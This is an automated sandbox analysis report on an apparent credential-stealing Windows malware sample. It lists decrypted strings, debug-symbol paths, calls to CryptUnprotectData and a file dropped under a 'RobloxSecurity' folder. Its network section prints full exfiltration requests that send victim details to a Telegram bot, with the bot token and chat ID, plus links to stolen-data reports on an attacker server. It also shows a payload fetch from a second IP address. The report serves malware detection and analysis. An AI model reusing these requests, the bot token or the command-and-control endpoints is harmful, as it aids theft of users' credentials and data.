Source: jqOHOuPMJP.exe | Joe Sandbox ML: detected
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: >{tnnsqc7~br
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: >tyy`ejj/euh5tx,r
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: 9s{tgd}b}~yr
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: ,yqdr,j!)/$"+}$#.~!%-$'-,+rzy"$xz&'),##z)wr.-#
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: fn{m8Gq}pjjf"gw~f+~~kg}{
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: jkK\k
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: -{whzMWg1sq&G
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: fbnu8ci*OJ ~{~t
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: faww8i}fpkdmmjq
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: 3&k-m88"+89"+8:"+
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: .dylpGul=`hz#o}
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: flq8JSNR[YPQ
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack | String decryptor: 88r`bE:~!ba}<}!pvvfs|1~q9o{d(us8:>!sme`''ml29o)r,c|}!|!vqr:
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 11_2_00007FFD9B9784B1 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 11_2_00007FFD9B9785FD CryptUnprotectData,
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Code function: 18_2_00007FFD9B9784A1 CryptUnprotectData,
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: jqOHOuPMJP.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\system32\rsaenh.dll.pdb| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
Source: Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
Source: Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
Source: Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
Source: Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source: Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source: Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
Source: Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B981888h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98016Dh
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98B834h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9775FCh
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B981FA1h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D1B7h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98E899h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D1B7h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9745F6h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D197h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97CA9Ch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97CC93h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B980CADh
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98B814h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97EA38h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B981F81h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98E879h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97D197h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9745F6h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B974622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B97771Ch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B984622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9845F6h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B984622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B98771Ch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B96771Ch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then dec eax
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B994622h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B9945F6h
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeCode function: 4x nop then jmp 00007FFD9B99730Ch

                  Networking

                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, type: DROPPED
                  Source: global trafficTCP traffic: 192.168.2.4:49738 -> 185.119.118.59:8080
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /byte/@jokerbot880901.txt HTTP/1.1Host: 82.147.85.194Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 82.147.85.194 82.147.85.194
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.147.85.194
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
